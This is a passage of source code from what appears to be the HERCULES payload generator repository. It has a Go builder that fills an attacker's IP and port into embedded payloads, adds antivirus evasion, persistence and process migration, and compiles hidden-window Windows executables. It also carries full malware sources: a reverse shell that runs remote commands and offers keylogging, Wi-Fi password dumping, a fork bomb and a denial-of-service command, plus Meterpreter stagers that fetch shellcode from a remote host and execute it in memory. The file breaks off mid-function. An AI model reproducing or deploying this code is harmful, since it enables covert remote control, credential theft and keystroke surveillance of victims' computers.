292 | BoldBlue.Println("#====================================================================================#")
293 | BoldBlue.Println("# SELECTED PAYLOAD | SIZE/UPX | AV Evasion Score #")
294 | BoldBlue.Println("#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~#")
295 | BoldBlue.Print("# Meterpreter Reverse HTTPS | 4.2 MB / 1.1 MB | ")
296 | if Payload.Score < 5 {
297 | BoldRed.Print(Payload.Score)
298 | }else if Payload.Score == 5 {
299 | BoldYellow.Print(Payload.Score)
300 | }else {
301 | BoldGreen.Print(Payload.Score)
302 | }
303 | if Payload.Score == 10 {
304 | BoldGreen.Print("/10 ")
305 | }else{
306 | BoldGreen.Print("/10 ")
307 | }
308 | BoldBlue.Println("#")
309 | BoldBlue.Println("#====================================================================================#")
310 | }else if Payload.Type == 4 {
311 | BoldBlue.Println("#====================================================================================#")
312 | BoldBlue.Println("# SELECTED PAYLOAD | SIZE/UPX | AV Evasion Score #")
313 | BoldBlue.Println("#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~#")
314 | BoldBlue.Print("# HERCULES REVERSE SHELL | 4.4 MB / 1.1 MB | ")
315 | if Payload.Score < 5 {
316 | BoldRed.Print(Payload.Score)
317 | }else if Payload.Score == 5 {
318 | BoldYellow.Print(Payload.Score)
319 | }else {
320 | BoldGreen.Print(Payload.Score)
321 | }
322 | if Payload.Score == 10 {
323 | BoldGreen.Print("/10 ")
324 | }else{
325 | BoldGreen.Print("/10 ")
326 | }
327 | BoldBlue.Println("#")
328 | BoldBlue.Println("#====================================================================================#")
329 | }
330 |
331 |
332 | if Payload.Persistence == true {
333 | BoldCyan.Print("\n[*] Persistence : ON")
334 | BoldWhite.Print(" (")
335 | BoldRed.Print("-2")
336 | BoldWhite.Println(")")
337 | }
338 | if Payload.Migrate == true {
339 | BoldCyan.Print("\n[*] Migration : ON")
340 | BoldWhite.Print(" (")
341 | BoldRed.Print("-1")
342 | BoldWhite.Println(")")
343 | }
344 |
345 | if Payload.UPX == true {
346 | BoldCyan.Print("\n[*] UPX : ON")
347 | BoldWhite.Print(" (")
348 | BoldRed.Print("-3")
349 | BoldWhite.Println(")")
350 | }
351 |
352 |
353 | if Payload.Type == 1 {
354 | if Payload.UPX == true && (Payload.Persistence || Payload.Migrate ){
355 | BoldCyan.Println("\n[*] Payload Size : 326 KB")
356 | }else if Payload.UPX == true && !(Payload.Persistence || Payload.Migrate) {
357 | BoldCyan.Println("\n[*] Payload Size : 262 KB")
358 | }else if Payload.UPX == false && !(Payload.Persistence || Payload.Migrate ) {
359 | BoldCyan.Println("\n[*] Payload Size : 946 KB")
360 | }
361 |
362 | }else{
363 | if Payload.UPX == true {
364 | BoldCyan.Println("\n[*] Payload Size : " + Payload.UPX_Size)
365 | }else{
366 | BoldCyan.Println("\n[*] Payload Size : " + Payload.Size)
367 | }
368 | }
369 |
370 |
371 | PayloadName := strings.TrimSuffix(Payload.FileName, ".go")
372 |
373 | PayloadName += ".exe"
374 |
375 | BoldCyan.Println("\n[*] Payload saved at : /$HOME/" + PayloadName + "\n\n")
376 |
377 |
378 | }
379 |
380 |
381 | func CompilePayload() {
382 | Yellow := color.New(color.FgYellow)
383 | BoldYellow := Yellow.Add(color.Bold)
384 | Red := color.New(color.FgRed)
385 | Warning := Red.Add(color.Bold)
386 |
387 | Payload.FileName += ".go"
388 |
389 | File, _ := os.Create(Payload.FileName)
390 | Source, _ := base64.StdEncoding.DecodeString(Payload.SourceCode)
391 | var SourceCode string
392 |
393 | if Payload.Type == 2 || Payload.Type == 3 {
394 | Address := string("\"http://" + Payload.Ip + ":" + Payload.Port + "/\"")
395 | SourceCode = strings.Replace(string(Source), string("\"http://127.0.0.1:8080/\""), string(Address), -1)
396 | if Payload.BypassAV == true {
397 | SourceCode = strings.Replace(string(SourceCode), "//import \"EGESPLOIT/RSE\"", "import \"EGESPLOIT/RSE\"", -1)
398 | SourceCode = strings.Replace(string(SourceCode), "//RSE.BypassAV(3)", "RSE.BypassAV(3)", -1)
399 | }
400 | if Payload.Persistence == true {
401 | SourceCode = strings.Replace(string(SourceCode), "//import \"EGESPLOIT/RSE\"", `import "EGESPLOIT/RSE"`, -1)
402 | SourceCode = strings.Replace(string(SourceCode), "//RSE.Persistence()", "RSE.Persistence()", -1)
403 | }
404 | if Payload.Migrate == true {
405 | SourceCode = strings.Replace(string(SourceCode), "//import \"EGESPLOIT/RSE\"", "import \"EGESPLOIT/RSE\"", -1)
406 | SourceCode = strings.Replace(string(SourceCode), "//RSE.Migrate(Addr, len(Shellcode))", "RSE.Migrate(Addr, len(Shellcode))", -1)
407 | }
408 |
409 |
410 | File.WriteString(SourceCode)
411 |
412 | BuildCommand_Args := string(`export GOOS=windows && export GOARCH=386 && export GOPATH=$HERCULES_PATH && go build -ldflags "-H windowsgui -s -w" ` + Payload.FileName)
413 | BoldYellow.Println("\n[*] Compiling payload...")
414 | BoldYellow.Println("\n[*] " + BuildCommand_Args)
415 | BuildCommand := exec.Command("sh", "-c", BuildCommand_Args)
416 | BuildCommand.Stdout = os.Stdout
417 | BuildCommand.Stderr = os.Stderr
418 | BuildCommand.Run()
419 | CleanFilesCommand := string("rm " + Payload.FileName)
420 | exec.Command("sh", "-c", CleanFilesCommand).Run()
421 | DirFiles, _ := exec.Command("sh", "-c", "ls").Output()
422 | FileName_No_Suffix := strings.TrimSuffix(Payload.FileName, ".go")
423 | if !(strings.Contains(string(DirFiles), FileName_No_Suffix)) {
424 | Warning.Println("\n[!] ERROR : Compile failed")
425 | os.Exit(1)
426 | }
427 | File.Close()
428 | MovePayload := string("mv " + FileName_No_Suffix + ".exe $HOME")
429 | exec.Command("sh", "-c", MovePayload).Run()
430 |
431 |
432 |
433 |
434 | }else if Payload.Type == 1 {
435 | var IP string = "[4]byte{"
436 | IP_Array := strings.Split(string(Payload.Ip), `.`)
437 | for i := 0; i < 4; i++ {
438 | if i == 3 {
439 | IP += (IP_Array[i] + ",")
440 | break
441 | }
442 | IP += (IP_Array[i] + "," + " ")
443 | }
444 | IP += "}}"
445 |
446 | SourceCode = strings.Replace(string(Source), `[4]byte{127,0,0,1}}`, IP, -1)
447 | SourceCode = strings.Replace(string(SourceCode), `5555`, Payload.Port, -1)
448 | if Payload.BypassAV == true {
449 | SourceCode = strings.Replace(string(SourceCode), "//import \"EGESPLOIT/RSE\"", "import \"EGESPLOIT/RSE\"", -1)
450 | SourceCode = strings.Replace(string(SourceCode), "//RSE.BypassAV(3)", "RSE.BypassAV(3)", -1)
451 | }
452 |
453 | if Payload.Persistence == true {
454 | SourceCode = strings.Replace(string(SourceCode), `//import "EGESPLOIT/RSE"`, `import "EGESPLOIT/RSE"`, -1)
455 | SourceCode = strings.Replace(string(SourceCode), `//RSE.Persistence()`, `RSE.Persistence()`, -1)
456 | }
457 | if Payload.Migrate == true {
458 | SourceCode = strings.Replace(string(SourceCode), `//import "EGESPLOIT/RSE"`, `import "EGESPLOIT/RSE"`, -1)
459 | SourceCode = strings.Replace(string(SourceCode), `//RSE.Migrate(Addr, int(Length_int))`, `RSE.Migrate(Addr, int(Length_int))`, -1)
460 | }
461 |
462 |
463 | File.WriteString(SourceCode)
464 |
465 | BuildCommand_Args := string(`export GOOS=windows && export GOARCH=386 && export GOPATH=$HERCULES_PATH && go build -ldflags "-H windowsgui -s -w" ` + Payload.FileName)
466 | BoldYellow.Println("\n[*] Compiling payload...")
467 | BoldYellow.Println("\n[*] " + BuildCommand_Args)
468 | BuildCommand := exec.Command("sh", "-c", BuildCommand_Args)
469 | BuildCommand.Stdout = os.Stdout
470 | BuildCommand.Stderr = os.Stderr
471 | BuildCommand.Run()
472 | CleanFilesCommand := string("rm " + Payload.FileName)
473 | exec.Command("sh", "-c", CleanFilesCommand).Run()
474 | DirFiles, _ := exec.Command("sh", "-c", "ls").Output()
475 | FileName_No_Suffix := strings.TrimSuffix(Payload.FileName, ".go")
476 | if !(strings.Contains(string(DirFiles), FileName_No_Suffix)) {
477 | Warning.Println("\n[!] ERROR : Compile failed")
478 | os.Exit(1)
479 | }
480 | File.Close()
481 | MovePayload := string("mv " + FileName_No_Suffix + ".exe $HOME")
482 | exec.Command("sh", "-c", MovePayload).Run()
483 |
484 | }else if Payload.Type == 4 {
485 | Payload.Ip = string(`"`+Payload.Ip+`"`)
486 | Payload.Port = string(`"`+Payload.Port+`"`)
487 | SourceCode = strings.Replace(string(Source), `"10.10.10.84"`, Payload.Ip, -1)
488 | SourceCode = strings.Replace(string(SourceCode), `"5555"`, Payload.Port, -1)
489 |
490 | File.WriteString(SourceCode)
491 |
492 | BuildCommand_Args := string(`export GOOS=windows && export GOARCH=386 && export GOPATH=$HERCULES_PATH && go build -ldflags "-H windowsgui -s -w" ` + Payload.FileName)
493 | BoldYellow.Println("\n[*] Compiling payload...")
494 | BoldYellow.Println("\n[*] " + BuildCommand_Args)
495 | BuildCommand := exec.Command("sh", "-c", BuildCommand_Args)
496 | BuildCommand.Stdout = os.Stdout
497 | BuildCommand.Stderr = os.Stderr
498 | BuildCommand.Run()
499 | CleanFilesCommand := string("rm " + Payload.FileName)
500 | exec.Command("sh", "-c", CleanFilesCommand).Run()
501 | DirFiles, _ := exec.Command("sh", "-c", "ls").Output()
502 | FileName_No_Suffix := strings.TrimSuffix(Payload.FileName, ".go")
503 | if !(strings.Contains(string(DirFiles), FileName_No_Suffix)) {
504 | Warning.Println("\n[!] ERROR : Compile failed")
505 | os.Exit(1)
506 | }
507 | File.Close()
508 | MovePayload := string("mv " + FileName_No_Suffix + ".exe $HOME")
509 | exec.Command("sh", "-c", MovePayload).Run()
510 |
511 | }
512 |
513 | }
514 |
515 | func AskMigrate() {
516 | Red := color.New(color.FgRed)
517 | Warning := Red.Add(color.Bold)
518 | Yellow := color.New(color.FgYellow)
519 | BoldYellow := Yellow.Add(color.Bold)
520 | BoldYellow.Print("\n[?] ")
521 | fmt.Print("Do you want to add migration function to payload (y/n) :")
522 | fmt.Scan(&Ask)
523 | if Ask == "y" || Ask == "Y" {
524 | Warning.Print("\n[!] Adding migration will decreases the AV Evasion Score and increase the paylaod size, do you still want to continue (Y/n) :")
525 | fmt.Scan(&Ask)
526 | if Ask == "y" || Ask == "Y"{
527 | Payload.Migrate = true
528 | Payload.Score = (Payload.Score - 1)
529 | }else{
530 | Payload.Migrate = false
531 | }
532 | }else{
533 | Payload.Migrate = false
534 | }
535 | }
536 |
537 |
538 |
539 |
540 | func AskPersistence() {
541 | Red := color.New(color.FgRed)
542 | Warning := Red.Add(color.Bold)
543 | Yellow := color.New(color.FgYellow)
544 | BoldYellow := Yellow.Add(color.Bold)
545 | BoldYellow.Print("\n[?] ")
546 | fmt.Print("Do you want to add persistence function to payload (y/n) :")
547 | fmt.Scan(&Ask)
548 | if Ask == "y" || Ask == "Y" {
549 | Warning.Print("\n[!] Adding persistence will decreases the AV Evasion Score and increase the paylaod size, do you still want to continue (Y/n) :")
550 | fmt.Scan(&Ask)
551 | if Ask == "y" || Ask == "Y"{
552 | Payload.Persistence = true
553 | Payload.Score = (Payload.Score - 2)
554 | }else{
555 | Payload.Persistence = false
556 | }
557 | }else{
558 | Payload.Persistence = false
559 | }
560 | }
561 |
562 | func AskBypassAV() {
563 | Red := color.New(color.FgRed)
564 | Warning := Red.Add(color.Bold)
565 | Yellow := color.New(color.FgYellow)
566 | BoldYellow := Yellow.Add(color.Bold)
567 | BoldYellow.Print("\n[?] ")
568 | fmt.Print("Do you want to add Bypass AV function to payload (y/n) :")
569 | fmt.Scan(&Ask)
570 | if Ask == "y" || Ask == "Y" {
571 | Warning.Print("\n[!] Adding Bypass AV will increase the paylaod size, do you still want to continue (Y/n) :")
572 | fmt.Scan(&Ask)
573 | if Ask == "y" || Ask == "Y"{
574 | Payload.BypassAV = true
575 | Payload.Score = (Payload.Score + 2)
576 | }else{
577 | Payload.BypassAV = false
578 | }
579 | }else{
580 | Payload.BypassAV = false
581 | }
582 | }
583 |
584 |
585 |
586 |
587 | func AskUPX() {
588 | Red := color.New(color.FgRed)
589 | Warning := Red.Add(color.Bold)
590 | Yellow := color.New(color.FgYellow)
591 | BoldYellow := Yellow.Add(color.Bold)
592 | BoldYellow.Print("\n[?] ")
593 | fmt.Print("Do you want to compress the payload with UPX (y/n) :")
594 | fmt.Scan(&Ask)
595 | if Ask == "y" || Ask == "Y" {
596 | Warning.Print("\n[!] Compressing payloads with UPX decreases the AV Evasion Score, do you still want to continue (Y/n) :")
597 | fmt.Scan(&Ask)
598 | if Ask == "y" || Ask == "Y"{
599 | Payload.UPX = true
600 | Payload.Score = (Payload.Score - 3)
601 | ClearScreen()
602 | PrintBanner()
603 |
604 | ExeName := strings.TrimSuffix(Payload.FileName, ".go")
605 | ExeName += ".exe"
606 | UPX_Command := string("upx --brute " + ExeName)
607 | UPX := exec.Command("sh", "-c", UPX_Command)
608 | UPX.Stdout = os.Stdout
609 | UPX.Run()
610 | }else{
611 | Payload.UPX = false
612 | }
613 | }else{
614 | Payload.UPX = false
615 | }
616 | }
617 |
618 |
619 | func ClearScreen() {
620 | Clear := exec.Command("clear")
621 | Clear.Stdout = os.Stdout
622 | Clear.Run()
623 | }
624 |
625 |
626 |
627 |
628 |
629 |
630 |
631 | func PreparePayload(No int) {
632 |
633 | Blue := color.New(color.FgBlue)
634 | BoldBlue := Blue.Add(color.Bold)
635 | Green := color.New(color.FgGreen)
636 | BoldGreen := Green.Add(color.Bold)
637 | Red := color.New(color.FgRed)
638 | Warning := Red.Add(color.Bold)
639 |
640 |
641 | if No == 1 {
642 | Payload.Type = 1
643 | Payload.Size = "946 KB"
644 | Payload.FullSize = "1.1 MB"
645 | Payload.MidSize = "326 KB"
646 | Payload.UPX_Size = "262 KB"
647 | Payload.Score = 8
648 | Payload.SourceCode = METERPRETER_TCP
649 |
650 | ClearScreen()
651 | PrintBanner()
652 |
653 | BoldBlue.Println("#====================================================================================#")
654 | BoldBlue.Println("# SELECTED PAYLOAD | SIZE/UPX | AV Evasion Score #")
655 | BoldBlue.Println("#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~#")
656 | BoldBlue.Print("# Meterpreter Reverse TCP | 946 KB / 262 KB | ")
657 | BoldGreen.Print(" 8/10 ")
658 | BoldBlue.Println("#")
659 | BoldBlue.Println("#====================================================================================#")
660 |
661 | for ;; {
662 | var IP string
663 | fmt.Print("\n\n[*] Enter LHOST : ")
664 | fmt.Scan(&IP)
665 | if (len(IP) < 7) || (len(IP) > 15) {
666 | Warning.Println("\n\n[!] ERROR : Invalid ip")
667 | }else{
668 | Payload.Ip = IP
669 | break
670 | }
671 |
672 | }
673 |
674 | for ;; {
675 | var PORT string
676 | fmt.Print("\n[*] Enter LPORT : ")
677 | fmt.Scan(&PORT)
678 | _, err := strconv.Atoi(PORT)
679 | if err == nil {
680 | Payload.Port = PORT
681 | break
682 | }
683 | Warning.Println("\n\n[!] ERROR : Invalid port")
684 |
685 | }
686 | AskPersistence()
687 | AskMigrate()
688 | AskBypassAV()
689 |
690 |
691 | }else if No == 2 {
692 |
693 | Payload.Type = 2
694 | Payload.Size = "4.2 MB"
695 | Payload.UPX_Size = "1.1 KB"
696 | Payload.Score = 8
697 | Payload.SourceCode = METERPRETER_HTTP_HTTPS
698 |
699 | ClearScreen()
700 | PrintBanner()
701 |
702 | BoldBlue.Println("#====================================================================================#")
703 | BoldBlue.Println("# SELECTED PAYLOAD | SIZE/UPX | AV Evasion Score #")
704 | BoldBlue.Println("#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~#")
705 | BoldBlue.Print("# Meterpreter Reverse HTTP | 4.2 MB / 1.1 MB | ")
706 | BoldGreen.Print(" 8/10 ")
707 | BoldBlue.Println("#")
708 | BoldBlue.Println("#====================================================================================#")
709 |
710 | for ;; {
711 | var IP string
712 | fmt.Print("\n\n[*] Enter LHOST : ")
713 | fmt.Scan(&IP)
714 | if (len(IP) < 7) || (len(IP) > 15) {
715 | Warning.Println("\n\n[!] ERROR : Invalid ip")
716 | }else{
717 | Payload.Ip = IP
718 | break
719 | }
720 |
721 | }
722 |
723 | for ;; {
724 | var PORT string
725 | fmt.Print("\n[*] Enter LPORT : ")
726 | fmt.Scan(&PORT)
727 | _, err := strconv.Atoi(PORT)
728 | if err == nil {
729 | Payload.Port = PORT
730 | break
731 | }
732 | Warning.Println("\n\n[!] ERROR : Invalid port")
733 |
734 | }
735 |
736 |
737 | AskPersistence()
738 | AskMigrate()
739 |
740 |
741 | }else if No == 3 {
742 | Payload.Type = 3
743 | Payload.Size = "4.2 MB"
744 | Payload.Score = 8
745 | Payload.SourceCode = METERPRETER_HTTP_HTTPS
746 |
747 | ClearScreen()
748 | PrintBanner()
749 |
750 | BoldBlue.Println("#====================================================================================#")
751 | BoldBlue.Println("# SELECTED PAYLOAD | SIZE/UPX | AV Evasion Score #")
752 | BoldBlue.Println("#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~#")
753 | BoldBlue.Print("# Meterpreter Reverse HTTPS | 4.2 MB / 1.1 MB | ")
754 | BoldGreen.Print(" 8/10 ")
755 | BoldBlue.Println("#")
756 | BoldBlue.Println("#====================================================================================#")
757 |
758 | for ;; {
759 | var IP string
760 | fmt.Print("\n\n[*] Enter LHOST : ")
761 | fmt.Scan(&IP)
762 | if (len(IP) < 7) || (len(IP) > 15) {
763 | Warning.Println("\n\n[!] ERROR : Invalid ip")
764 | }else{
765 | Payload.Ip = IP
766 | break
767 | }
768 |
769 | }
770 |
771 | for ;; {
772 | var PORT string
773 | fmt.Print("\n[*] Enter LPORT : ")
774 | fmt.Scan(&PORT)
775 | _, err := strconv.Atoi(PORT)
776 | if err == nil {
777 | Payload.Port = PORT
778 | break
779 | }
780 | Warning.Println("\n\n[!] ERROR : Invalid port")
781 |
782 | }
783 |
784 | AskPersistence()
785 | AskMigrate()
786 |
787 |
788 |
789 | }else if No == 4 {
790 | Payload.Type = 4
791 | Payload.Size = "4.4 MB"
792 | Payload.Score = 9
793 | Payload.SourceCode = HERCULES_REVERSE_SHELL
794 |
795 | ClearScreen()
796 | PrintBanner()
797 |
798 | BoldBlue.Println("#====================================================================================#")
799 | BoldBlue.Println("# SELECTED PAYLOAD | SIZE/UPX | AV Evasion Score #")
800 | BoldBlue.Println("#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~#")
801 | BoldBlue.Print("# HERCULES REVERSE SHELL | 4.4 MB / 1.1 MB | ")
802 | BoldGreen.Print("7/10 ")
803 | BoldBlue.Println("#")
804 | BoldBlue.Println("#====================================================================================#")
805 |
806 | for ;; {
807 | var IP string
808 | fmt.Print("\n\n[*] Enter LHOST : ")
809 | fmt.Scan(&IP)
810 | if (len(IP) < 7) || (len(IP) > 15) {
811 | Warning.Println("\n\n[!] ERROR : Invalid ip")
812 | }else{
813 | Payload.Ip = IP
814 | break
815 | }
816 |
817 | }
818 |
819 | for ;; {
820 | var PORT string
821 | fmt.Print("\n[*] Enter LPORT : ")
822 | fmt.Scan(&PORT)
823 | _, err := strconv.Atoi(PORT)
824 | if err == nil {
825 | Payload.Port = PORT
826 | break
827 | }
828 | Warning.Println("\n\n[!] ERROR : Invalid port")
829 |
830 | }
831 |
832 |
833 |
834 | }else {
835 |
836 | ClearScreen()
837 | PrintBanner()
838 | PrintPayloads()
839 |
840 | Warning.Println("\n[!] ERROR : Invalid choise\n")
841 |
842 | fmt.Print("\n\n[*] Select : ")
843 | fmt.Scan(&NO)
844 |
845 | PreparePayload(NO)
846 |
847 | }
848 |
849 | }
850 |
--------------------------------------------------------------------------------
/SOURCE/Payloads/HERCULES REVERSE SHELL.go:
--------------------------------------------------------------------------------
1 | package main
2 |
3 | import "net"
4 | import "os/exec"
5 | import "bufio"
6 | import "strings"
7 | import "syscall"
8 | import "time"
9 | import "EGESPLOIT"
10 |
11 |
12 |
13 | const IP string = "10.10.10.84"
14 | const PORT string = "5555"
15 |
16 | const BACKDOOR bool = false;
17 | const EMBEDDED bool = false;
18 | const TIME_DELAY time.Duration = 5;//Second
19 |
20 | const B64_BINARY string = "//INSERT-BINARY-HERE//"
21 | const BINARY_NAME string = "winupdt.exe"
22 |
23 | var GLOBAL_COMMAND string;
24 | var PARAMETERS string;
25 | var KeyLogs string;
26 |
27 |
28 |
29 | func main() {
30 |
31 |
32 | if EMBEDDED == true {
33 | EGESPLOIT.Dispatch(B64_BINARY, BINARY_NAME, PARAMETERS)
34 | }
35 |
36 |
37 | if BACKDOOR == true {
38 | EGESPLOIT.Persistence()
39 | }
40 |
41 | connect, err := net.Dial("tcp", IP+":"+PORT);
42 | if err != nil {
43 | time.Sleep(TIME_DELAY*time.Second);
44 | main();
45 | };
46 |
47 |
48 |
49 | Dir, Version, Username, AV := EGESPLOIT.Sysguide()
50 | SysGuide := (BANNER + "# SYSGUIDE\n" + "|" + string(Version) + "|\n|\n~> User : " + string(Username) + "\n|\n|\n~> AV : " + string(AV) + "\n\n\n" + string(Dir) + ">")
51 | connect.Write([]byte(string(SysGuide)));
52 |
53 |
54 |
55 | for {
56 |
57 | Command, _ := bufio.NewReader(connect).ReadString('\n');
58 | _Command := string(Command);
59 | GLOBAL_COMMAND = _Command;
60 |
61 |
62 |
63 | if strings.Contains(_Command, "~please") || strings.Contains(_Command, "~PLEASE") {
64 | connect.Write([]byte(EGESPLOIT.Please(GLOBAL_COMMAND)));
65 | }else if strings.Contains(_Command, "~METERPRETER") || strings.Contains(_Command, "~meterpreter") {
66 | Temp_Address := strings.Split(_Command, "\"")//~meterpreter --tcp "127.0.0.1:4444"
67 | Address := string(Temp_Address[1])
68 | ConType := strings.Split(_Command, " ")
69 | ConType[1] = strings.TrimPrefix(ConType[1], "--")
70 | EGESPLOIT.Meterpreter(ConType[1], Address)
71 | connect.Write([]byte("\n\n[+] Meterpreter Executed !\n\n"+Dir+">"));
72 | }else if strings.Contains(_Command, "~MIGRATE") || strings.Contains(_Command, "~migrate") {
73 | Temp_Address := strings.Split(_Command, "\"")//~migrate "127.0.0.1:4444" 1212
74 | Address := string(Temp_Address[1])
75 | Pid := strings.Split(_Command, " ")
76 | Result, Error := EGESPLOIT.Migrate(Pid[2], Address)
77 | if Result == true {
78 | connect.Write([]byte("\n\n[+] Succesfully Migrated !\n\n"+Dir+">"));
79 | }else{
80 | connect.Write([]byte("\n\n"+Error+"\n\n"+Dir+">"));
81 | }
82 | }else if strings.Contains(_Command, "~DOS") || strings.Contains(_Command, "~dos") {
83 | DOS_Command := strings.Split(GLOBAL_COMMAND, "\"")
84 | var DOS_Target string = DOS_Command[1]
85 | if strings.Contains(string(DOS_Target), "http") {
86 | go EGESPLOIT.Dos(DOS_Target);
87 | connect.Write([]byte("\n\n[*] Starting DOS atack..."+"\n\n[*] Sending 1000 request to "+DOS_Target+" !\n\n"+Dir+">"));
88 | }else{
89 | connect.Write([]byte("\n\n[-] ERROR: Invalid url !\n\n"+Dir+">"));
90 | }
91 | }else if strings.Contains(_Command, "~DISTRACT") || strings.Contains(_Command, "~distract") {
92 | EGESPLOIT.Distrackt();
93 | }else if strings.Contains(_Command, "~KEYLOGGER-DEPLOY") || strings.Contains(_Command, "~keylogger-deploy") || strings.Contains(_Command, "~Keylogger-Deploy"){
94 | go EGESPLOIT.Keylogger(&KeyLogs);
95 | connect.Write([]byte(string("\n[*] Keylogger deploy completed\n" + "\n" + string(Dir) + ">")));
96 | }else if strings.Contains(_Command, "~KEYLOGGER-DUMP") || strings.Contains(_Command, "~keylogger-dump") || strings.Contains(_Command, "~Keylogger-Dump"){
97 | Dump_Output := string("################## KEYLOGGER DUMP ##################" + "\n\n" + string(KeyLogs) + "\n####################################################" + "\n"+string(Dir)+">");
98 | connect.Write([]byte(Dump_Output));
99 | }else if strings.Contains(_Command, "~WIFI-LIST") || strings.Contains(_Command, "~wifi-list") {
100 | List := EGESPLOIT.WifiList();
101 | connect.Write([]byte(string(List)));
102 | }else if strings.Contains(_Command, "~HELP") || strings.Contains(_Command, "~help") {
103 | connect.Write([]byte(string(HELP+Dir+">")));
104 | }else if strings.Contains(_Command, "~PERSISTENCE") || strings.Contains(_Command, "~persistence") {
105 | go EGESPLOIT.Persistence();
106 | connect.Write([]byte("\n\n[*] Adding persistence registries...\n[*] Persistence Completed\n\n" + string(Dir) +">"));
107 | }else{
108 | cmd := exec.Command("cmd", "/C", _Command);
109 | cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true};
110 | out, _ := cmd.Output();
111 | Command_Output := string("\n\n"+string(out)+"\n"+string(Dir)+">");
112 | connect.Write([]byte(Command_Output));
113 | };
114 | };
115 | };
116 |
117 |
118 |
119 |
120 |
121 |
122 | var BANNER string = `
123 | __ ____________ ________ ____ ___________
124 | / / / / ____/ __ \/ ____/ / / / / / ____/ ___/
125 | / /_/ / __/ / /_/ / / / / / / / / __/ \__ \
126 | / __ / /___/ _, _/ /___/ /_/ / /___/ /___ ___/ /
127 | /_/ /_/_____/_/ |_|\____/\____/_____/_____//____/
128 |
129 |
130 | ############################ HERCULES REVERSE SHELL ############################
131 | `
132 |
133 |
134 |
135 |
136 | var HELP string = `
137 |
138 | __ ____________ ________ ____ ___________
139 | / / / / ____/ __ \/ ____/ / / / / / ____/ ___/
140 | / /_/ / __/ / /_/ / / / / / / / / __/ \__ \
141 | / __ / /___/ _, _/ /___/ /_/ / /___/ /___ ___/ /
142 | /_/ /_/_____/_/ |_|\____/\____/_____/_____//____/
143 |
144 |
145 | ############################ HERCULES REVERSE SHELL ##########################################
146 |
147 |
148 |
149 | ~PERSSISTENCE Installs a persistence module for continious acces
150 |
151 | ~DISTRACT Executes a fork bomb bat file for distraction
152 |
153 | ~PLEASE Asks users comfirmation for higher privilidge operations
154 |
155 | ~DOS -A "www.targetsite.com" Starts a denial of service atack
156 |
157 | ~WIFI-LIST Dumps all wifi history data with passwords
158 |
159 | ~METERPRETER --http "10.0.0.1:4444" Creates a meterpreter connection to metasploit (http/https/tcp)
160 |
161 | ~KEYLOGGER-DEPLOY Installs a keylogger module and logs all keystrokes
162 |
163 | ~KEYLOGGER-DUMP Dumps all loged keystrokes
164 |
165 | ~MIGRATE "10.0.0.1:4444" 2222 Creates a reverse http meterpreter session at given pid (EXPERIMENTAL)
166 |
167 |
168 | ###############################################################################################
169 |
170 | `
171 |
--------------------------------------------------------------------------------
/SOURCE/Payloads/Meterpreter_Reverse_HTTP_HTTPS.go:
--------------------------------------------------------------------------------
1 | package main
2 |
3 | import "net/http"
4 | import "syscall"
5 | import "unsafe"
6 | import "io/ioutil"
7 | //import "EGESPLOIT/RSE"
8 |
9 |
10 |
11 | const MEM_COMMIT = 0x1000
12 | const MEM_RESERVE = 0x2000
13 | const PAGE_AllocateUTE_READWRITE = 0x40
14 |
15 | var K32 = syscall.NewLazyDLL("kernel32.dll")
16 | var VirtualAlloc = K32.NewProc("VirtualAlloc")
17 | var Address string = "http://127.0.0.1:8080/"
18 | var Checksum string = "102011b7txpl71n"
19 |
20 |
21 |
22 | func main() {
23 | //RSE.Persistence()
24 | Address += Checksum
25 | Response, err := http.Get(Address)
26 | if err != nil {
27 | main()
28 | }
29 | Shellcode, _ := ioutil.ReadAll(Response.Body)
30 |
31 | Addr, _, err := VirtualAlloc.Call(0, uintptr(len(Shellcode)), MEM_RESERVE|MEM_COMMIT, PAGE_AllocateUTE_READWRITE)
32 | if Addr == 0 {
33 | main()
34 | }
35 | AddrPtr := (*[990000]byte)(unsafe.Pointer(Addr))
36 | for i := 0; i < len(Shellcode); i++ {
37 | AddrPtr[i] = Shellcode[i]
38 | }
39 | //RSE.Migrate(Addr, len(Shellcode))
40 | syscall.Syscall(Addr, 0, 0, 0, 0)
41 |
42 | }
43 |
--------------------------------------------------------------------------------
/SOURCE/Payloads/Meterpreter_Reverse_TCP.go:
--------------------------------------------------------------------------------
1 | package main
2 |
3 |
4 | import "encoding/binary"
5 | import "syscall"
6 | import "unsafe"
7 | //import "EGESPLOIT/RSE"
8 |
9 | const MEM_COMMIT = 0x1000
10 | const MEM_RESERVE = 0x2000
11 | const PAGE_AllocateUTE_READWRITE = 0x40
12 |
13 |
14 | var K32 = syscall.NewLazyDLL("kernel32.dll")
15 | var VirtualAlloc = K32.NewProc("VirtualAlloc")
16 |
17 |
18 | func Allocate(Shellcode uintptr) (uintptr) {
19 |
20 | Addr, _, _ := VirtualAlloc.Call(0, Shellcode, MEM_RESERVE|MEM_COMMIT, PAGE_AllocateUTE_READWRITE)
21 | if Addr == 0 {
22 | main()
23 | }
24 | return Addr
25 | }
26 |
27 | func main() {
28 | //RSE.Persistence()
29 | var WSA_Data syscall.WSAData
30 | syscall.WSAStartup(uint32(0x202), &WSA_Data)
31 | Socket, _ := syscall.Socket(syscall.AF_INET, syscall.SOCK_STREAM, 0)
32 | Socket_Addr := syscall.SockaddrInet4{Port: 5555, Addr: [4]byte{127,0,0,1}}
33 | syscall.Connect(Socket, &Socket_Addr)
34 | var Length [4]byte
35 | WSA_Buffer := syscall.WSABuf{Len: uint32(4), Buf: &Length[0]}
36 | UitnZero_1 := uint32(0)
37 | DataReceived := uint32(0)
